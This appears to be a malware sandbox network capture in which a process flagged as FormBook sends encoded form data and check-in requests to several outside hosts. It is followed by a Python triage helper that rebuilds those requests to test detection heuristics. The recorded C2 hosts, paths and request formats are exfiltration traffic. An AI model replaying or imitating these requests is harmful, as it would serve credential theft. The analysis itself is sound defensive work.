                                                                                Nov 26, 2024 09:30:27.840614080 CET | 449 | OUT | GET /c8xp/?ynlT=l2hePdG2jE2F6AlCjwqyhHlkxUQzRJGliE9tGVtIaiFMA3WO/t2DJG5mtSw4Uv/mQsI3gW77r9LMmz2KJVksCi0s4BCVbW+K50/dKIaUUEtFLragHdQcQoqOBThjHGNr3A==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.honk.city
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:30:28.971760035 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                date: Tue, 26 Nov 2024 08:30:28 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1490
                                                                                x-request-id: 0b166bab-855f-431d-bd78-39364681f1bc
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ja4iNubnXNuPcSJhefkC7a/wnprK8kJESW5vN1QLwGtc1TZLdx5BTndx+QnIhVOWpF6LPk0BAv6MLpF5ZNRzjw==
                                                                                set-cookie: parking_session=0b166bab-855f-431d-bd78-39364681f1bc; expires=Tue, 26 Nov 2024 08:45:28 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 61 34 69 4e 75 62 6e 58 4e 75 50 63 53 4a 68 65 66 6b 43 37 61 2f 77 6e 70 72 4b 38 6b 4a 45 53 57 35 76 4e 31 51 4c 77 47 74 63 31 54 5a 4c 64 78 35 42 54 6e 64 78 2b 51 6e 49 68 56 4f 57 70 46 36 4c 50 6b 30 42 41 76 36 4d 4c 70 46 35 5a 4e 52 7a 6a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ja4iNubnXNuPcSJhefkC7a/wnprK8kJESW5vN1QLwGtc1TZLdx5BTndx+QnIhVOWpF6LPk0BAv6MLpF5ZNRzjw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Nov 26, 2024 09:30:28.971817970 CET | 943 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGIxNjZiYWItODU1Zi00MzFkLWJkNzgtMzkzNjQ2ODFmMWJjIiwicGFnZV90aW1lIjoxNzMyNjA5OD


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                41 | 192.168.2.8 | 49754 | 13.248.169.48 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:34.935585022 CET | 701 | OUT | POST /t3a1/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.gupiao.bet
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.gupiao.bet
                                                                                Referer: http://www.gupiao.bet/t3a1/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 4e 77 56 31 37 6b 75 75 51 37 49 76 79 42 63 58 30 2f 50 69 53 6d 73 4d 38 58 6a 74 54 77 36 55 61 62 66 6b 53 53 41 51 35 4a 52 6d 46 31 78 6b 63 79 53 49 39 42 2f 59 37 79 63 75 56 53 30 31 5a 75 53 4c 71 42 6b 5a 43 30 39 2b 6e 70 35 6f 54 32 57 41 69 59 37 35 6b 67 65 55 44 75 38 69 65 7a 75 48 68 63 37 6a 45 6f 33 31 6c 78 70 70 66 6f 6f 50 6d 57 72 74 49 7a 4f 67 62 5a 6b 50 57 66 45 70 4a 43 59 62 59 51 43 38 54 74 73 52 4a 2b 37 4b 43 66 69 5a 55 4f 62 4d 32 50 64 6f 38 30 42 58 52 6e 48 6e 33 5a 48 47 42 75 41 42 2f 4e 38 39 76 6f 71 75 38 4f 43 4c 68 55 57 41 47 41 67 49 76 67 3d
                                                                                Data Ascii: ynlT=oNwV17kuuQ7IvyBcX0/PiSmsM8XjtTw6UabfkSSAQ5JRmF1xkcySI9B/Y7ycuVS01ZuSLqBkZC09+np5oT2WAiY75kgeUDu8iezuHhc7jEo31lxppfooPmWrtIzOgbZkPWfEpJCYbYQC8TtsRJ+7KCfiZUObM2Pdo80BXRnHn3ZHGBuAB/N89voqu8OCLhUWAGAgIvg=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                42 | 192.168.2.8 | 49755 | 13.248.169.48 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:37.594918013 CET | 721 | OUT | POST /t3a1/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.gupiao.bet
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.gupiao.bet
                                                                                Referer: http://www.gupiao.bet/t3a1/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 4e 77 56 31 37 6b 75 75 51 37 49 70 53 78 63 45 6a 54 50 6b 79 6d 76 41 63 58 6a 6b 7a 77 2b 55 61 6e 66 6b 54 58 46 51 4c 64 52 6c 67 78 78 6e 65 61 53 4c 39 42 2f 54 62 79 64 7a 6c 53 2f 31 5a 71 61 4c 71 39 6b 5a 43 51 39 2b 69 56 35 6f 6b 43 58 41 79 59 35 2f 6b 67 63 51 44 75 38 69 65 7a 75 48 68 4a 51 6a 45 77 33 30 57 35 70 70 2b 6f 72 54 57 57 73 36 34 7a 4f 6b 62 5a 67 50 57 66 36 70 49 66 31 62 61 59 43 38 53 64 73 57 59 2b 34 46 43 66 6b 57 30 50 4e 48 44 32 51 6c 63 30 68 58 79 4c 79 73 31 51 36 48 33 66 71 62 64 46 36 2b 76 41 42 75 2f 6d 30 4f 57 4a 2b 61 6c 51 51 57 34 30 77 6a 44 7a 57 44 46 33 70 50 45 33 38 74 67 5a 78 7a 35 68 59
                                                                                Data Ascii: ynlT=oNwV17kuuQ7IpSxcEjTPkymvAcXjkzw+UanfkTXFQLdRlgxxneaSL9B/TbydzlS/1ZqaLq9kZCQ9+iV5okCXAyY5/kgcQDu8iezuHhJQjEw30W5pp+orTWWs64zOkbZgPWf6pIf1baYC8SdsWY+4FCfkW0PNHD2Qlc0hXyLys1Q6H3fqbdF6+vABu/m0OWJ+alQQW40wjDzWDF3pPE38tgZxz5hY


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                43 | 192.168.2.8 | 49756 | 13.248.169.48 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:40.393663883 CET | 1738 | OUT | POST /t3a1/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.gupiao.bet
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.gupiao.bet
                                                                                Referer: http://www.gupiao.bet/t3a1/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 4e 77 56 31 37 6b 75 75 51 37 49 70 53 78 63 45 6a 54 50 6b 79 6d 76 41 63 58 6a 6b 7a 77 2b 55 61 6e 66 6b 54 58 46 51 4c 6c 52 6c 57 4e 78 6c 2f 61 53 4b 39 42 2f 61 37 79 59 7a 6c 53 69 31 64 47 57 4c 71 77 5a 5a 45 55 39 2f 41 74 35 67 31 43 58 4b 79 59 35 79 45 67 66 55 44 75 74 69 65 6a 69 48 68 5a 51 6a 45 77 33 30 51 64 70 2b 2f 6f 72 41 47 57 72 74 49 7a 4b 67 62 5a 59 50 57 48 71 70 49 71 49 62 4b 34 43 38 79 4e 73 51 71 6d 34 4d 43 66 6d 58 30 50 46 48 44 7a 51 6c 63 6f 44 58 7a 2b 70 73 32 77 36 4c 54 71 78 47 76 42 48 38 73 67 4b 75 66 69 45 51 6d 5a 36 53 7a 49 35 57 49 59 54 30 32 6a 56 55 6b 7a 5a 47 30 2b 6f 77 48 4a 35 6a 73 4a 4d 67 2f 67 43 33 46 38 35 49 48 38 50 49 53 57 74 2f 61 2f 4a 66 31 4c 6e 75 6c 78 64 42 37 53 76 61 76 4c 54 38 36 48 56 50 59 62 34 78 59 4a 76 43 45 31 32 2f 69 4b 2f 43 77 45 75 62 61 55 50 38 6c 70 39 44 67 6a 4c 70 77 41 54 70 31 34 36 78 6a 4a 6c 4e 79 49 34 68 6e 64 48 69 52 32 78 41 56 62 58 6c 46 36 77 4d 69 33 67 70 6e 45 72 64 [TRUNCATED]
                                                                                Data Ascii: ynlT=oNwV17kuuQ7IpSxcEjTPkymvAcXjkzw+UanfkTXFQLlRlWNxl/aSK9B/a7yYzlSi1dGWLqwZZEU9/At5g1CXKyY5yEgfUDutiejiHhZQjEw30Qdp+/orAGWrtIzKgbZYPWHqpIqIbK4C8yNsQqm4MCfmX0PFHDzQlcoDXz+ps2w6LTqxGvBH8sgKufiEQmZ6SzI5WIYT02jVUkzZG0+owHJ5jsJMg/gC3F85IH8PISWt/a/Jf1LnulxdB7SvavLT86HVPYb4xYJvCE12/iK/CwEubaUP8lp9DgjLpwATp146xjJlNyI4hndHiR2xAVbXlF6wMi3gpnErd [TRUNCATED]


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                44 | 192.168.2.8 | 49757 | 13.248.169.48 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:43.267810106 CET | 450 | OUT | GET /t3a1/?ynlT=lPY12PoV4Qu/vhxaDGrG8k6ABtrDoTA3UbOQjSvNRb0mvGBHituRHrNfT9/xpia5xYCwJL1ofkUI7HJ5t37uE3V94n9AcHyNncbJEzMiuzMO81JxmNo9FVK575fLvIMTSQ==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.gupiao.bet
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:30:44.357635975 CET | 409 | IN | HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Tue, 26 Nov 2024 08:30:44 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 269
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 6e 6c 54 3d 6c 50 59 31 32 50 6f 56 34 51 75 2f 76 68 78 61 44 47 72 47 38 6b 36 41 42 74 72 44 6f 54 41 33 55 62 4f 51 6a 53 76 4e 52 62 30 6d 76 47 42 48 69 74 75 52 48 72 4e 66 54 39 2f 78 70 69 61 35 78 59 43 77 4a 4c 31 6f 66 6b 55 49 37 48 4a 35 74 33 37 75 45 33 56 39 34 6e 39 41 63 48 79 4e 6e 63 62 4a 45 7a 4d 69 75 7a 4d 4f 38 31 4a 78 6d 4e 6f 39 46 56 4b 35 37 35 66 4c 76 49 4d 54 53 51 3d 3d 26 42 5a 63 70 3d 46 78 4c 78 73 4e 43 78 33 78 74 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ynlT=lPY12PoV4Qu/vhxaDGrG8k6ABtrDoTA3UbOQjSvNRb0mvGBHituRHrNfT9/xpia5xYCwJL1ofkUI7HJ5t37uE3V94n9AcHyNncbJEzMiuzMO81JxmNo9FVK575fLvIMTSQ==&BZcp=FxLxsNCx3xt"}</script></head></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                45 | 192.168.2.8 | 49758 | 185.26.237.170 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:49.893357992 CET | 713 | OUT | POST /plc2/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.fengzheng.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.fengzheng.shop
                                                                                Referer: http://www.fengzheng.shop/plc2/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 68 68 68 6f 66 38 4f 42 58 54 6e 66 73 45 35 64 54 45 63 47 72 67 68 55 4d 73 6f 4a 63 49 4d 38 7a 74 30 44 36 6d 62 4d 55 6f 69 2b 6a 6f 59 2f 4e 67 33 43 34 78 6e 52 4c 64 78 72 75 73 52 65 72 65 45 33 2b 64 32 36 4e 65 4a 31 62 6c 52 78 37 62 79 57 5a 42 61 57 37 4f 30 36 68 31 55 76 38 43 39 49 65 41 78 54 66 4b 32 62 4f 2f 71 36 65 54 46 7a 41 76 50 70 69 63 42 30 63 31 41 37 42 64 30 61 4f 33 6c 73 55 61 38 45 30 74 32 54 46 6a 68 4d 4f 75 4a 63 4f 4d 65 30 64 55 57 35 34 39 43 42 33 71 57 2b 42 72 52 55 44 53 35 53 68 6d 33 55 65 47 52 64 61 43 62 54 39 7a 52 71 30 5a 63 6a 76 37 67 3d
                                                                                Data Ascii: ynlT=hhhof8OBXTnfsE5dTEcGrghUMsoJcIM8zt0D6mbMUoi+joY/Ng3C4xnRLdxrusRereE3+d26NeJ1blRx7byWZBaW7O06h1Uv8C9IeAxTfK2bO/q6eTFzAvPpicB0c1A7Bd0aO3lsUa8E0t2TFjhMOuJcOMe0dUW549CB3qW+BrRUDS5Shm3UeGRdaCbT9zRq0Zcjv7g=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                46 | 192.168.2.8 | 49759 | 185.26.237.170 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:52.564970970 CET | 733 | OUT | POST /plc2/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.fengzheng.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.fengzheng.shop
                                                                                Referer: http://www.fengzheng.shop/plc2/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 68 68 68 6f 66 38 4f 42 58 54 6e 66 74 6e 68 64 63 48 30 47 2b 77 68 54 43 4d 6f 4a 57 6f 4d 47 7a 74 49 44 36 6e 4f 4c 55 62 47 2b 6a 4a 6f 2f 66 30 6a 43 39 78 6e 52 54 4e 78 55 71 73 52 76 72 65 59 46 2b 63 4b 36 4e 65 74 31 62 6e 4a 78 37 71 79 56 44 78 61 55 77 75 30 38 2b 6c 55 76 38 43 39 49 65 41 6b 2b 66 4b 75 62 4f 4d 69 36 4d 68 39 77 44 76 50 75 79 4d 42 30 57 56 41 2f 42 64 30 6f 4f 79 39 43 55 59 30 45 30 73 47 54 47 33 56 50 42 75 4a 65 54 63 66 7a 52 6d 48 38 30 64 75 6d 36 59 50 66 4a 36 6c 58 47 6b 49 34 37 45 2f 53 64 47 35 32 61 42 7a 6c 34 45 4d 43 75 36 4d 54 78 73 32 4d 39 70 47 55 74 69 76 38 4f 6d 57 72 5a 64 70 75 35 48 6d 30
                                                                                Data Ascii: ynlT=hhhof8OBXTnftnhdcH0G+whTCMoJWoMGztID6nOLUbG+jJo/f0jC9xnRTNxUqsRvreYF+cK6Net1bnJx7qyVDxaUwu08+lUv8C9IeAk+fKubOMi6Mh9wDvPuyMB0WVA/Bd0oOy9CUY0E0sGTG3VPBuJeTcfzRmH80dum6YPfJ6lXGkI47E/SdG52aBzl4EMCu6MTxs2M9pGUtiv8OmWrZdpu5Hm0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                47 | 192.168.2.8 | 49760 | 185.26.237.170 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:55.242955923 CET | 1750 | OUT | POST /plc2/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.fengzheng.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.fengzheng.shop
                                                                                Referer: http://www.fengzheng.shop/plc2/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 68 68 68 6f 66 38 4f 42 58 54 6e 66 74 6e 68 64 63 48 30 47 2b 77 68 54 43 4d 6f 4a 57 6f 4d 47 7a 74 49 44 36 6e 4f 4c 55 62 4f 2b 6a 62 67 2f 4e 46 6a 43 2b 78 6e 52 61 74 78 52 71 73 52 49 72 65 42 4d 2b 63 47 45 4e 63 46 31 4b 30 42 78 79 34 61 56 4e 42 61 55 2f 4f 30 39 68 31 55 6d 38 43 73 42 65 41 30 2b 66 4b 75 62 4f 4e 79 36 62 6a 46 77 4d 50 50 70 69 63 41 67 63 31 41 48 42 64 73 53 4f 7a 4a 38 56 73 41 45 31 4d 57 54 4a 6b 39 50 49 75 4a 59 53 63 66 52 52 6d 4c 33 30 64 79 41 36 5a 36 4b 4a 39 52 58 47 46 6c 64 6d 55 72 45 4c 32 64 34 56 53 2f 30 35 6d 31 6a 6e 34 63 56 32 2b 4b 38 32 2b 71 70 75 53 6a 78 44 42 44 76 4e 4c 31 4f 34 77 48 34 44 4d 43 6a 5a 78 58 6b 59 38 75 46 59 48 6c 71 43 34 31 69 67 68 36 62 77 6d 65 2f 5a 30 74 65 4d 6a 4c 50 56 4c 45 62 62 4e 7a 70 56 56 33 45 38 6a 53 65 6a 67 2f 33 75 30 50 53 68 4b 32 35 4c 72 69 4b 61 74 48 4c 38 4c 74 77 4b 6b 7a 48 41 44 71 55 68 32 32 4e 4d 69 4a 65 51 7a 54 69 73 5a 71 58 30 46 2f 4a 41 36 57 55 65 31 61 74 6a [TRUNCATED]
                                                                                Data Ascii: ynlT=hhhof8OBXTnftnhdcH0G+whTCMoJWoMGztID6nOLUbO+jbg/NFjC+xnRatxRqsRIreBM+cGENcF1K0Bxy4aVNBaU/O09h1Um8CsBeA0+fKubONy6bjFwMPPpicAgc1AHBdsSOzJ8VsAE1MWTJk9PIuJYScfRRmL30dyA6Z6KJ9RXGFldmUrEL2d4VS/05m1jn4cV2+K82+qpuSjxDBDvNL1O4wH4DMCjZxXkY8uFYHlqC41igh6bwme/Z0teMjLPVLEbbNzpVV3E8jSejg/3u0PShK25LriKatHL8LtwKkzHADqUh22NMiJeQzTisZqX0F/JA6WUe1atj [TRUNCATED]


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                48 | 192.168.2.8 | 49761 | 185.26.237.170 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:57.903362036 CET | 454 | OUT | GET /plc2/?ynlT=sjJIcM7rXxnPrFlvc0dBoChSE+wOUJkO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBQWFy+wjnVcK8AF+QDRLSO2OD8bfVRVlBcPU0ek8UWp3Qg==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.fengzheng.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
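Sessions 41 to 48 are one exchange repeated against two hosts: three POSTs of growing size (205, 225 and 1241 bytes of form data) to /t3a1/ on www.gupiao.bet, then a GET carrying the same ynlT parameter plus BZcp, and the identical sequence against /plc2/ on www.fengzheng.shop, all from PID 6504, the process whose memory the JoeSecurity_FormBook_1 rule matches. Every request carries the same Chrome/43 "BitdefenderSafepay/2016" User-Agent, the POSTs set Origin and Referer to their own target, and the form values contain raw '+', '/' and '=' that a browser would percent-encode. The Python below is an added triage example for this report; it is not Joe Sandbox output and not code from the sample. It rebuilds three of the recorded requests as constructed input (targets and bodies copied from sessions 41, 44 and 45, plus one invented benign form post as a negative case), extracts the hosts and paths a responder would block, and applies shape heuristics that are this example's own assumptions drawn from the recorded traffic, not a vendor signature.

```python
"""Triage helper for the HTTP sessions recorded above (added example, not Joe Sandbox output)."""
import re
from urllib.parse import urlsplit

# The User-Agent carried by every request from PID 6504 in sessions 41-48 above.
OBSERVED_UA = ("Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
               "Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 "
               "(3.43.0.2357.18, like Chrome 20150815)")

# Characters a browser percent-encodes inside an application/x-www-form-urlencoded value.
RAW_B64_CHARS = re.compile(r"[+/=]")


def _request(method, target, host, ua, body=None):
    """Build a raw HTTP/1.1 request with the header set seen in the report (constructed input)."""
    lines = [f"{method} {target} HTTP/1.1", "Accept: */*", "Accept-Language: en-US,en;q=0.9",
             f"Host: {host}", "Connection: close", f"User-Agent: {ua}"]
    if body is not None:
        path_dir = target.rsplit("/", 1)[0] + "/"
        lines += ["Accept-Encoding: gzip, deflate, br", "Cache-Control: no-cache",
                  f"Content-Length: {len(body)}", "Content-Type: application/x-www-form-urlencoded",
                  f"Origin: http://{host}", f"Referer: http://{host}{path_dir}"]
    return "\r\n".join(lines) + "\r\n\r\n" + (body or "")


# Targets and bodies copied from sessions 41, 44 and 45; the last request is an invented benign form post.
SAMPLE_REQUESTS = [
    _request("POST", "/t3a1/", "www.gupiao.bet", OBSERVED_UA,
             "ynlT=oNwV17kuuQ7IvyBcX0/PiSmsM8XjtTw6UabfkSSAQ5JRmF1xkcySI9B/Y7ycuVS01ZuSLqBkZC09+np5oT2WAiY75kgeUDu8iezuHhc7jEo31lxppfooPmWrtIzOgbZkPWfEpJCYbYQC8TtsRJ+7KCfiZUObM2Pdo80BXRnHn3ZHGBuAB/N89voqu8OCLhUWAGAgIvg="),
    _request("GET", "/t3a1/?ynlT=lPY12PoV4Qu/vhxaDGrG8k6ABtrDoTA3UbOQjSvNRb0mvGBHituRHrNfT9/xpia5xYCwJL1ofkUI7HJ5t37uE3V94n9AcHyNncbJEzMiuzMO81JxmNo9FVK575fLvIMTSQ==&BZcp=FxLxsNCx3xt",
             "www.gupiao.bet", OBSERVED_UA),
    _request("POST", "/plc2/", "www.fengzheng.shop", OBSERVED_UA,
             "ynlT=hhhof8OBXTnfsE5dTEcGrghUMsoJcIM8zt0D6mbMUoi+joY/Ng3C4xnRLdxrusRereE3+d26NeJ1blRx7byWZBaW7O06h1Uv8C9IeAxTfK2bO/q6eTFzAvPpicB0c1A7Bd0aO3lsUa8E0t2TFjhMOuJcOMe0dUW549CB3qW+BrRUDS5Shm3UeGRdaCbT9zRq0Zcjv7g="),
    _request("POST", "/login", "www.example.com",
             "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36",
             "username=alice&next=%2Faccount%2F"),
]
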